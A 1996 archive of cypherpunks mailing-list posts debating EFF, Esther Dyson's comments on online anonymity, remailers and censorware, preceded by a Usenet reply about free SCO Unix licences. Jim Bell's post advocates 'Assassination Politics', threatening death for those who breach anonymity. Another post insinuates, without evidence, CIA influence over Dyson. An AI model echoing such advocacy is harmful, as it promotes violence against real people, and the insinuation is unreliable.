OTOH, UNIX Systems Labs was sold to Novell, who didn't do much with it, 
and then sold it to SCO. A free single-user license sounds suspiciously 
like the old Novell Personal Edition Unixware. Anybody know if this is 
what's being given away? I'd look, but I haven't got much use for yet 
another free UNIX - the two I have work fine.

> 
> > > This is for single user home based UNIX systems.
> > 
> > Single-user UNIX isn't all that useful.
> 

If this is the old Pers. Ed., it will support one or two users via 
telnet/ftp in addition to console. Certainly enough for someone who wants 
a system for educational purposes, using X-windows to access the office, 
work on coding, etc.

If you want to write a commercial app. for SCO, it's darn nice of them to 
give you a free license to use as a development platform.

> Multi-user ain't much better. Listen to the guys who built it. UNIX
> is a program development environment. In the early years it was
> interesting because there was source available, that ceased to be
> the case years ago.

I feel so stupid for having bought all that Sun Microsystems and HP stock 
years ago ...

It is a good platform for many applications; running a desktop OS for a 
user who only types memos and takes phone messages probably isn't one of 
them, although I'm sure I'll hear from someone who disagrees.

It does make a good, scalable base for SQL databases, is the primary 
handler of email, runs a lot of the world's engineering software, etc ...

I'm sure if you looked around you'd even find Solitaire for it. :)

I use M$-Windoze as the standard desktop for most business 
applications, with UNIX-based SQL servers, web servers, and email 
servers, in general. Just my preference.

> 
> Today Linux probably represents the future of the UNIX familly, it
> allows people who want to hack at the OS level access to the sources
> of a fully functioning OS. This allows people to add in new kernel
> features, schedulers and other exotica without having to write a
> whole new O/S.
> 

I wouldn't expect a free OS in a constant state of change to replace 
commercially supported operating systems; they each have their purposes. 
Some people want access to the source code, and some people want 24x7 on 
site support. Yes, there's great support available for Linux and BSD on 
the 'net. That's not at issue. Some business models need a vendor out 
there that can furnish a maintenance contract and uphold it.

> Just don't confuse it with "home computing", this is geek computing
> and you better have a lot of interest in computing to use it. Home
> computing is the market for users who need a system thats simpler
> than a VCR or they can't use it. At one time that meant Apple, today
> it means Microsoft, it will never mean Linux - not unless someone
> can make Linux much much simpler than it is at present and provide
> decent WISIWIG tools such as editors etc. designed for use by aunt
> Ethel.

Maybe Aunt Ethel is into kernel tuning. ;)

I agree with you to a point; UNIX has not had an idiot-proof "stick the 
disk in the drive and type setup" capability until recently. UNIX apps 
are fewer in variety, and cost nmore than their M$-D0S/Windoze 
counterparts. Partly because anyone who wanted to develop could do so on 
an affordable D0S system.

If the free SCO offering is the old Novell Pers. Ed. (I don't know, just 
venturing a guess), Aunt Ethel just might be able to install it (your 
Aunt Ethel - mine's a kernel hack). As I recall, it came w/ a GUI 
installation routine.

Just my $.02

> 
> 
> 		Phill
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 3 Sep 1996 17:43:27 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <199609022254.PAA09742@netcom10.netcom.com>
Message-ID: <Pine.SUN.3.94.960902190237.3068B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Sep 1996, Vladimir Z. Nuri wrote:

> 
> ah, the quasi-yearly ranting on EFF has started up. what a great
> opportunity for drop-down-drag-dead flamewar.
> 
> Black Unicorn: I resent your holier-than-thou moral posturing
> over EFF, and am going to attack it as representative of other
> criticism I have seen of EFF. 

I, unlike EFF, have never compromised my efforts to make strong crypto,
unescrowed strong crypto, and digitial communications, free from the FUD
spouted by government and media alike.  I, unlike EFF, have never
compromised my efforts to resist the expansion of a wiretap state.  I,
unlike EFF, have never proported to be a political represenative for these
positions and folded under the weakest of pressures like a reed.

> EFF is an organization that is professional and has
> worked toward improving cyberspace. it is easy for someone
> such as yourself to criticize such an organization anonymously,
> but what is the justification of your criticism? to me someone
> who has tried and failed, yet is still trying, is better than 
> someone who has never tried.

I would put forth that you know nothing of my efforts, and therefore are
in no position to judge me.  I would also put forth that the efforts of
EFF, or lack thereof, are quite public.

> what *constructive* 
> alternative to EFF do you propose? if you have none, please shut up.

I think any organization that would apply political pressure rather than
bow to it would be an alternative.  I think an organization in touch
enough with its own policy to prevent its staff and board from making
embarassing big brother type proposals to curtail the ability of any of us
to post without attributation would be an alternative.  I think an
organization without the internal conflict and strife that has clearly
marred EFF in past and made it a laughable attempt at cohesive political
persuasion would be an alternative.  I think an organization that had
official policies on the core issues which it proposes to influence would
be an alternative.

In short, an organization that had even one of the needed elements of
legislative influence.  (Cohesive, directed, persistent, and
uncompromising).

> I am tired of people announcing loudly to the world, "well if EFF
> doesn't support [insert my personal jihad here], then they're 
> a bunch of losers who don't deserve anyone's money".

Now who's holier-than-thou?  What is so shocking about announcing that a
given organization does not support my interests and therefore calling on
others who share my interests not to make financial donations to said
organization?  Is there something EFF fears in free speech and political
consensus building?  Perhaps if they had a straightforward policy....

Were I to say that the Clinton administration has accomplished nothing but
oppression (not that this is necessarily my view) and that others should
place their resources elsewhere would you claim that somehow I was in the
wrong?  Political speech is in the air every day.  Learn to live with it,
even if you do not agree with the points contained within.

Phrased another way, who cares what you are tired of hearing?

That's what filters and channel changers and off buttons are for.

> >Why am I any more mistaken  for pointing out that a single influential
> >member of EFF's staff or board is anti-anonymity and yet remains with the
> >organization than you are for pointing out that a single influential
> >member who happened to be anti-anonymity has left?
> 
> get a clue. an organization does not have to officially espouse what
> its members espouse.

No, but when an organization espouses nothing on a given subject key to
its mission, what does that say?  What about when its members espouse
entirely different and even counter productive beliefs?  I would hardly
trust Senator Burns on the board of the ACLU, or a George Pacific
exec on Sierra Club's board.  What's different here?

> what an organization espouses should be carefully
> crafted. if all members feel strongly about an issue, yet all also
> feel that it should not be part of the official plank, then that may be
> a wise decision to leave it out. what an organization does *not* do is as 
> important as what it does do. EFF is learning, by trial and error and the
> hard way, to "choose battles wisely".

I thought its point was to protect cyberspace?  What battles are left
after Digital Telecom, Anonymous Communication, Strong Crypto and CDA?

There aren't many battles to choose.  Let's seem some action.  I can sit
on my hands all day long too, but I will hardly claim to be supporting
hunger prevention in Africa by "thinking very hard about the subject."
(Particularly not when I have accepted money to further that goal).

> I would love to see more info about EFF's new direction. but one
> can ask for such clarification without a rabid style such as your own.

Are you one of those people who still believes you can get more flies with
honey...?  Ever been to Washington, D.C.?

> >In so far as an organization is much defined by those involved, I think it
> >entirely right to wonder aloud about the personal motives of the staff and
> >board.  I think this PARTICULARLY prudent given EFF's reputation and prior
> >conduct.
> 
> blah, blah, blah. why should EFF give the slightest damn what you think
> of them?

Its fairly clear that they don't.  That said, why should I not make that
point known.  "Folks, EFF doesn't give a damn what I think.  If you think
what I think, then they don't give a damn what you think either."  This is
called POLITICS.  They are free to ignore people like me when we comment
that their public appearance is damaging them.  They will also pay the
price for doing so.  What kind of organization proports to support
and then ignores the public?

 if you were at the helm of a competing organization that
> was doing superior work, or a privacy lobbyist with a track record,
> maybe they should listen. as it stands I think they are giving you
> far more respect than you deserve by even responding to your
> various scurrilous insinuations.

Apparently their view of the respect I deserve and yours are disperate.
You yourself admitted that my criticisms were generally represenative.  I
hardly think my worth is the issue.

> why do I see so much of this in cyberspace and on the cpunks list:
> gripes, gripes, gripes by people who have no record themselves of
> doing anything constructive...? the difficulty of doing something
> constructive is proven by the failures, it is not necessarily 
> evidence of incompetence or conspiracies. perhaps you, Unicorn,
> feel the cpunks have a greater track record than EFF? 

I do infact feel the cpunks have a greater track record than EFF.  Tell
me, what has EFF done?  The list of "cypherpunk" accomplishments in terms
of making the net a better place to be is, in my view, significant.
Certainly the discussion here is livelier than anything I've seen from
EFF.

> >I would be most happy to be proven wrong and see EFF suddenly, in a burst
> >of impressive moral fiber, speak out publically and take some political
> >action to assure anonymous communication.
> 
> I would like you to explain why you feel the need to criticize EFF
> for not necessarily sharing your own agenda.

The same reason I feel free to criticize communism for not sharing my own
agenda.

You reveal here the basic character of your objection.  You don't like
the fact that I criticized EFF.  It has nothing to do with the fact that
you think EFF has done wonderful and fantastic things (you point to none
in this post) but that you have some emotional fondness for them.  This is
the trap.  EFF _sounds_ good, and so its worth sticking up for.  Well
what, EFF, have you done for us LATELY?

> >Well, let's have a clear official position issued then to end all dispute.
> 
> again, you fail to grasp: EFF may justifiably not want to engage in that
> fight. it might be a wise decision.  who are you to dictate EFF's
> agenda? why are you picking a fight with someone who might be the
> best ally?

If EFF is the best ally then we need to seek others.  They have done
nothing in my view to help keep strong crypto around, to secure a person's
right to speak without a citizen unit I.D. being attached, and to promote,
by extension, free speech.  Look, even you have gotten on my case here for
speaking without revealing my real name.  You think something I said
libelous?  Is it dangerous?  Would you like to contact me further about
it?  What precisely is the need to attach my real name to this work about?
It's about retribution.  It's about the need to see people unable to
really speak as they think, and the need to have words softened so no one
is "hurt."  Forget it.  I will not pay the political and financial price
of revealing my name just to make you, or anyone else, happy.

> >I'm hardly going to support an organization that proports to be
> >pro-internet freedom and yet has no official position on anonyminity. 
> 
> perhaps you would be more influential if you learned to spell what
> you are advocating. (hee, hee)

English is not my first language.  Start paying my hourly rate to type in
the thousands of words and dozens of legal summaries I send to this list
every month and I will begin to proof read carefully.

> > Of
> >course you should expect people to wonder about EFF when you have no
> > official position and yet some staff and board members seem to have a
> >statist bent.
> 
> and you, like many other cypherpunks and cyberspace weasels, 
> have a whine-and-shriek-from-the-shadows bent.

And your point is?

You'd like the shadows lifted?  Speaking without a true name attached is
somehow evil?

> BTW, I reject the claim by some here (e.g. TCM) that the supposed change in
> direction at EFF implies that such an organization is inherently
> top-heavy and will fail in comparison to cypherpunk guerilla-style
> "technology deployment."  it seems to me both the cpunk philosophy
> and the EFF philosophy can coexist, and I really get tired of people
> who can't think past a "only one can exist" worldview.

Why not make some solid arguments for why TCM is wrong then?  Certainly it
appears he is on the mark to me.

> I also don't understand the anonymity fight by cpunks. it's the
> wrong battle imho. ask any remailer operators how their services
> are panning out. they will complain of the incessant spam and
> increasing litigious pressure. I don't see any technological 
> solutions to these problems. if there were, they'd have been 
> invented now. 

This is EFF talking.  "The situation is hopeless, bail now to preserve
image."

> let's face it, anonymity is a pain in the ass
> to support. maybe there are other goals that are more crucial
> that lie at the heart of anonymity. what cpunks are really
> seaking is  "assurance of freedom from retribution". when the
> problem is phrased more openly like that, other solutions become
> possible and worth consideration. anonymity is only one such
> way to achieve this goal. I for one would like to see more
> experimentation with reputation systems. "aw gee, nobody knows what
> one would look like". well, that's the point. 

Explain to me how reputation systems work in the absence of anonymity.
Explain to me when freedom has been anything but "a pain in the ass."

Weakness is all you have to offer.  Offer it to EFF.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Gimon <gimonca@skypoint.com>
Date: Tue, 3 Sep 1996 12:35:52 +0800
To: cypherpunks@toad.com
Subject: Cocktail Party Conversation...
Message-ID: <Pine.SV4.3.91.960902194042.8737B-100000@mirage>
MIME-Version: 1.0
Content-Type: text/plain


...of the clueful who should know better...

"Ms. Denning, I'd like to introduce Ms. Dyson.
    Ms. Dyson, Ms. Denning."


 ***********************************************************************
 Wild new Ubik salad dressing, not    | gimonca@skypoint.com
 Italian, not French, but an entirely | Minneapolis MN USA
 new and different taste treat that's | http://www.skypoint.com/~gimonca
 waking up the world!                 | A lean, mean meme machine.
 ***********************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Tue, 3 Sep 1996 10:14:18 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: [NOISE] Re: FLT 800: From the Rumor Mill...
In-Reply-To: <199609020352.FAA29463@basement.replay.com>
Message-ID: <199609022357.TAA06324@nrk.com>
MIME-Version: 1.0
Content-Type: text


Anonymous sez:
> 
> 
> Well, not quite the same situation. IIRC, the Iranian aircraft refused to resp
> 
> The Iranian Airbus was also flying out of what was essentially "hostile" airsp
> 
> Feel free to correct my memory if I'm wrong.

I wish I had an off-list way to say this:

	Mr Anonymous: won't you please fix your posting s/w
	so it break lines correctly? It's a Royal PITA to
	deal with as it is....

	Often I do want to read your comments, but when you make it a
	hassle...

(I now return to the flame war already in progress...)

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chuck Thompson <chuck@nova-net.net>
Date: Tue, 3 Sep 1996 12:27:52 +0800
To: cypherpunks@toad.com
Subject: The Esther Dyson Flap
Message-ID: <1.5.4.32.19960903005919.0068fc70@mail.nova-net.net>
MIME-Version: 1.0
Content-Type: text/plain


I don't quite understand the position taken by Mr. Assange and Mr. Unicorn
regarding recent statements attributed to Ms. Dyson.  I would appreciate
some additional insight.

It appears as though they are both critical of statements (taken out of
context according to Dyson) because of her position with the EFF.  It
appears that they both believe that she has no right to her opinion if it is
contradictory to the policy of the EFF.  

If such an EFF policy exists, and if Dyson is of a different opinion, the
fact that she holds office in an organization with which she is not in total
agreement should not count against her.  In fact, it is to her credit that
she has the courage to speak her mind, considering that hers is an elected
position.  She has something to lose by speaking her mind publicly.  Mr.
Unicorn remains anonymous, thereby mitigating repercussions which might
otherwise accrue to him as a result of the expression of his opinion.

I agree with Mr. Unicorn that the EFF should state its position
unequivocally.  I do not agree that officers or staff of EFF should not be
allowed to disagree with that position, if in fact they do.  In the case of
Ms. Dyson, how can we know whether she agrees or disagrees with a
non-existant policy?  She has, evidently, spoken her mind.  Isn't that what
freedom of speech allows?  Imagine, if you will, where we would be right now
if all elected representatives were censured for disagreeing with stated
government policy.  That ability is what makes this country great - and,
what you both seem to be saying you stand for.  Is your position solid only
if everyone agrees with you and you them?  Whatever happened to "defending
to the death your right to say it"?

Pouncing on someone, without knowing all the facts, who is vulnerable
because of their position smacks of dirty politics - it is distasteful.  Why
not ask for the facts from the source?  Then state your opinions or make
your threats about not contributing financially.

In keeping with the message, you have the right to take a cheap shot.  I'd
just like some insight into your thinking.
Regards,

Chuck Thompson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 4 Sep 1996 04:48:11 +0800
To: Jon Lebkowsky <vznuri@netcom.com>
Subject: Re: What is the EFF doing exactly?
Message-ID: <199609031557.IAA28466@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:52 AM 9/3/96 -0500, Jon Lebkowsky wrote:
> "Uncompromising" is not an "element of legislative influence," at least not
> on this planet.

Dead wrong:

The pols always say "We would like your help in writing legislation, but
if you want to contribute to the legislation you must accept reasonable
compromise".

But we do not want legislation, so we do not want to help write legislation.

We want to delay legislation for as long as possible, for the longer the
delay, the more the balance of power favors the net and disavors the pols.

Therefore the correct strategy is simply to attack any politician who shows
any interest in legislating on our issues.

We have no friends on Capitol hill, and if we did have friends, it would
still be necessary to denounce them as enemies.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 3 Sep 1996 14:56:18 +0800
To: cypherpunks@toad.com
Subject: Re: The Esther Dyson Flap
Message-ID: <ae50e777000210044438@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:59 AM 9/3/96, Chuck Thompson wrote:
>I don't quite understand the position taken by Mr. Assange and Mr. Unicorn
>regarding recent statements attributed to Ms. Dyson.  I would appreciate
>some additional insight.
>
>It appears as though they are both critical of statements (taken out of
>context according to Dyson) because of her position with the EFF.  It
>appears that they both believe that she has no right to her opinion if it is
>contradictory to the policy of the EFF.

Certainly no one is suggesting she should have her right of free speech
taken away from her, as a citizen.

Rather, these are precarious times for the future of the Net, with actions
in many countries, including the U.S. to restrict the Net in various ways.
Esther Dyson is in an influential postition, not just because of her new
role as Chairman of the EFF. Anytime a person of her influence is seen to
be supporting limitations on what private citizens can communicate to
others or to the public at large, this is cause for worry.

(As both John Gilmore and Stanton McCandlish have noted, anonymity has a
long history in the United States. From the Federalist Papers, to anonymous
leafletting (upheld by the Supreme Court), to anonymous letters to the
editor, to the basic architecture of the Postal System and the phone
system, anonymity has been with us for a long time.

Esther Dyson says that anonymity on the Net can do more damage than
anonymity in other forums, and thus may need to be regulated and restricted
in various ways. I disagree, as "the Net of a Million Lies" (to use Vinge's
term) has grown up with anonymity, and few people take the anonymous (or
not) rants and charges made in the millions per day with the same degree of
certainty they take print comments. Put another way, there is no clear and
present danger.

And the Net makes for effective counterspeech. As free speech advocates
note, the proper remedy for bad speech is more speech. (The links between
"free speech" and "anonymity" are fairly obvious, and curtailing one
curtails the other. "Congress shall make no law restricting speech" says
nothing about anonymous speech being subject to regulation.)

Further, the computerized nature of Net speech makes other remedies
available as well. For example, reputation-ratings services. And digital
signatures (to preclude forged comments).

Speech on the Net closely resembles idiots, scholars, dweebs, and
scoundrels ranting in public parks. Sometimes they accuse the mayor of
adultery, sometimes they rant about UFOs, sometimes they merely utter
obscenities. All are potentially dangerous, potentially ignorable,
potentially humorous. And yet in none of these cases is there a demand that
identification be produced, that one's papers be in order, that a "free
speech license" be produced upon demand by the authorities.

(Some might say that the physical personna of the speaker means that a
means of last resort--apprehending the person--exists to track down a
speaker of illegal thoughts, and that this is the kind of last resort that
is currently lacking for Net speech. Perhaps. But this very same lack is
evidenced with anonymous pamphlets, with anonymous pieces written for
newsletters (where even an editor may not know the author), and with phone
calls, say, to radio call-in programs. Clearly someone calling "The Howard
Stern Show" and making a preposterous, or even illegal, claim is reaching
many more people than is some anonymous message to a Usenet newsgroup.
Again, where is the clear and present danger with anonymous Net speech that
would justify (putatively) greater restrictions on Net speech than other
speech channels have?)


>Pouncing on someone, without knowing all the facts, who is vulnerable
>because of their position smacks of dirty politics - it is distasteful.  Why
>not ask for the facts from the source?  Then state your opinions or make
>your threats about not contributing financially.

Well, many of us did not pounce. Speaking for myself, I strongly suspected
that the newspaper article had summarized a more-nuanced point and had
effectively taken just a convenient sound bite.

(Also, I'd heard Dyson speak on anonymity issues before, and knew her to
have some doubts about full-blown crypto anarchy.)

Now that she has somewhat clarified what it was she actually said, more
issues have been raised.

I believe she does not understand the problems implicit in trying to
provide "accountability" for online speech. What if, for example, I offer
to forward things I receive to various online forums? Am I then violating a
law by "anonymizing" a message? Am I supposed to check identities? (How?)

Are remailers to be declared illegal? If not, all other "accountability"
laws go out the window.

This is the "knife edge," or "fork in the road," I've long talked about. If
anonymity is outlawed, it will take draconian measures to enforce
it--citizen-unit ID cards, officially issued encryption keys, escrow,
monitoring of communications, massive penalties to deter illegal use of
encryption, and other police state measures.

On the other hand, if enough degrees of freedom are left untouched, the
result is a growing, expanding crypto anarchy. Government will find itself
powerless to control commerce (handled via encrypted channels), will find
it doesn't know the True Names of various Net entities, and will end up
being chased into an enclave of things it _can_ control.

My strong hunch is that no stable solutions lie between these two extremes.
This is one of those "decision points" for modern society, with attractors
pulling the solution to one side or another.

We know which side we stand on. It's possible that Esther Dyson is finding
herself on the other side, alongside Dorothy Denning, Louis Freeh, Donn
Parker, and the other advocates of "responsible freedom."

(Anytime you hear someone speaking of "responsible freedom," look out.)

I don't call her our enemy. Perhaps she just hasn't thought things through
as deeply as many of us have.

Given that I think EFF has pretty much lost any role it may have once had,
for a variety of reasons we're probably all tired of hearing about, I'm not
too worried about what the EFF says or does on this issue. I'm more
worried, to be honest, that a person as influential _for other reasons_ as
Esther Dyson is talking about responsible freedom and the need to limit
certain forms of speech.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Tue, 3 Sep 1996 13:55:10 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Scoring Politicians on Digital Liberty Issues (Re: Net Politics)
In-Reply-To: <01I90CVK55W89JDDSI@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.91.960902201453.23619J-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Sep 1996, E. ALLEN SMITH wrote:

> 	I would suggest that support for "parental empowerment" and for
> any sort of mandated rating system (e.g., PICS with a requirement to rate
> pages for parental censorship use) be a down-rating.

No arguments here. Check out the latest article to follow up on the
CyberWire Dispatch story in which Brock and I revealed what the
"smut-blockers" *really* block. 

It's in Internet World Online, at the URL below.

-Declan



// declan@eff.org // I do not represent the EFF // declan@well.com //


   Linkname: Who Will Watch the Watchmen?
   Filename: http://www.iw.com/current/feature3.html 

   
                         WHO WILL WATCH THE WATCHMEN?

   By Eric Berlin and Andrew Kantor
   
    Porno-filtering software may be blocking out more than most people 
    realize.

   Porno-filtering software or "censorware" is a big thing these days. It
   lets parents make sure their kids aren't seeing Bad Things on the Net
   -- things like pornography, violence, and information about drugs. Oh,
   and did we mention AIDS, Judaism, fascism, and some guy named Fred?
   How about any Web site in the crl.com domain? Thanks to an apparent
   philosophy of "block first, ask questions later" -- plus a combination
   of overzealousness, with a little laziness and ignorance tossed in --
   some filtering software is screening out more than most people expect.
   To top it off, often neither users of the software nor owners of the
   blocked sites know about it.

[...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Mon, 2 Sep 1996 21:23:51 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <Pine.SUN.3.94.960902024727.26034B-100000@polaris>
Message-ID: <199609021023.UAA09571@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> On Sun, 1 Sep 1996, Esther Dyson wrote:
> 
> > Now, speaking personally: I believe there are trade-offs -- which is what I
> > told the LA Times.  I assume I was quoted accurately (although the word
> > "enforce" is awkward), but out of context.   Anonymity can be dangerous --
> > as can traceability, especially in/by repressive regimes.  Therefore I would
> > favor allowing anonymity -- with some form of traceability only under terms
> > considerably stronger than what are generally required for a wiretap.
> > Anyone who seriously needs anonymity because of a repressive government is
> > likely to use a foreign (outside whatever jurisdiction he fears) server, so
> > that this is not a matter of "local" laws.  The tracer would have to pass
> > through what I hope would be tighter hoops than we have now.  
> > 
> > Please note that this is not the same as the right to *private*
> > conversations and the use of encryption; this is the issue of being
> > accountable for what you publish in public.  
> 
> I've left the attributation list open because I think my view a majority
> one.
> 
> The inclinations I had to be involved with or financially support EFF are,
> after reading this, entirely quashed.
> 
> What is or is not your personal or EFF's official position is meaningless.
> It is clear that the personal beliefs of those involved in EFF are
> those of compromise, present day politics, and a general lack of moral
> fiber.
> 
> The political assumptions and the degree of technical invasion that would
> make the above scheme possible are either hopelessly naive, or insidiously
> invasive.
>  
> --
> I hate lightning - finger for public key - Vote Monarchist
> unicorn@schloss.li

I agree with you whole-heartedly. I am stunned by the EFF's position on
this matter and they no longer have my support. Here are some more
of Dyson's statements on this subject.

[http://bin-1.gnn.com/gnn/feat/dyson/index.html]

   [...]

   The EFF began very much as a civil rights "don't tread on me" kind of
   organization, and in a sense one of our major jobs was helping to
   educate law enforcement and the government. I wouldn't say that job
   is done, but now we also need to educate a broader population. If our
   motto was civil rights in cyberspace, it's now civil rights and
   responsibilities, because as more people come on to the Internet,
   they have to understand their responsibilities as well as their
   rights. If people don't do that, someone is going to try to come and
   regulate them. We are trying to create a civil society rather than a
   legal society in cyberspace.

   [...]

   We are strongly in favor of privacy, although there's some kind of
   balance required because of the need for a free press. Anonymity is a
   tougher one, and we actually don't have a formal position on that.
   The need for anonymity I agree with, but there are issues with
   accountability that mean it shouldn't be absolute.

Examining in detail Dyson's interests it appears she maintains a
sizeable and long-standing interest in Eastern European technology
companies. She is also clearly very far to the right of the political
spectrum (rampant capitalist would be putting it mildly). She also speaks
Russian. I'm not saying she has been working for the CIA for the past
decade, but I would be very surprised if the CIA has not exerted quite
significant pressure (which they are easily able to do given the
location of many of Dyson's assets) in order to bring her into their
folds during that time period.

-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 4 Sep 1996 04:45:14 +0800
To: cypherpunks@toad.com
Subject: Re: The Esther Dyson Flap
Message-ID: <199609031617.JAA01391@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:11 PM 9/2/96 -0700, Timothy C. May wrote:
> Esther Dyson says that anonymity on the Net can do more damage than
> anonymity in other forums, and thus may need to be regulated and restricted
> in various ways.
>
> [...]
>
> This is the "knife edge," or "fork in the road," I've long talked about. If
> anonymity is outlawed, it will take draconian measures to enforce
> it--citizen-unit ID cards, officially issued encryption keys, escrow,
> monitoring of communications, massive penalties to deter illegal use of
> encryption, and other police state measures.


Esther Dyson has gone over to the enemy, she is chairman of the EFF, 
therefore the EFF has gone over to the enemy.


> I don't call her our enemy. Perhaps she just hasn't thought things through
> as deeply as many of us have.

This seems unlikely.  After all, it is her job.

The net makes free speech more effective.  Therefore the world must become
more free, or else must suppress free speech, and thus become less free.

Which side are you on?

It is that simple.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 3 Sep 1996 16:01:20 +0800
To: Stanton McCandlish <mech@eff.org>
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
Message-ID: <199609030339.UAA01367@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:06 PM 9/2/96 -0700, Stanton McCandlish wrote:

>You have to have an anonymizing system that crosses a dozen or so 
>national boundaries to make such an attack infeasible for most large 
>organizations.  You'd need a system that crossed 50 or more widely 
>disparate jurisdictions to make it infeasible to large intelligence or 
>law enforcement agencies, and even then you'd have to NOT have broad 
>international agreements, such as you'd called for or it would be trivial 
>to force all the remailers in the chain to cough up personally 
>identifiable information.
>
>> My assumption is that there will be a wide variety of Net communities with
>> different rules/regulations/attitudes towards anonymity that would apply ex
>
>This is already true.
>
>> some kind of international sanctions; I think that's appropriate.  
>
>That's what bugs me - if there are some kind of sanctions coming from a 
>governmental body (I may be misinterpreting you here), that's probably 
>enough to kill private and well as public anonymity on the Net.
>
>Incidentally, if something does happen from a governmental direction to 
>kill online anonymity, it will probably be readily broadenable to all 
>other media.

At the risk of sounding like a broken record (a phrase that will get ever 
more obscure now that we're in the CD era...) that's why I pushing AP 
(Assassination Politics.)  While anonymous remailers and chains are great 
for security, there ought to be some final bulwark against violations of our 
security and anonymity that doesn't depend on legal arguments, or even 
technical refinements of encryption.  When organizations such as CoS can 
seek Penet data with impunity, and when courts in Finland can let them, 
we're not safe.  

Remember the saying, "The best defense is a good offense."  Playing as we do 
now, it's like saying, "We'll try our best to maintain our security, but if 
it fails too bad."   I propose changing it to, "We'll try our best to 
maintain our security, but if you manage to violate it anyway you're dead."  
As rude as it may sound, one of the best advantages is that this defense is 
free while it's not needed, and is pretty cheap when called upon.

In case anybody has any residual doubts as to whether we should enforce our 
rights in this way, consider this: if we've decided that we have the right 
to anonymity and security (through remailers and encryption) EVEN IF some 
people might misuse those tools to cause crime and potentially even death 
(which, of course, would be an exceedingly rare outcome) then I suggest 
we've already accepted the principle that our rights to use these tools 
daily are more important than the possibility of a rare negative outcome. 
(in the same sense that occasional fatal car accidents don't justify taking 
away all cars.)   And if that's the case, we should also be willing to 
DELIVER a rare negative outcome to anyone who acts to take these rights 
away, particularly if such a person is adequately forewarned of our 
intentions.   


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 3 Sep 1996 12:23:28 +0800
To: patrick b cummings <patrickbc@juno.com>
Subject: Re: Sen. Leahy's "impeccable cyberspace credentials"
In-Reply-To: <19960830.170609.9758.0.patrickbc@juno.com>
Message-ID: <Pine.LNX.3.93.960902203906.967D-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 31 Aug 1996, patrick b cummings wrote:

> jimbell,
> I agree with what you are saying but not all polititions are that bad. 
> You make it sound as if their are no politisions are for freedom of the
> net.

     Politicians get power by restricting, not by liberating. Politicians 
who liberate don't get re-elected. 

 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 3 Sep 1996 12:41:08 +0800
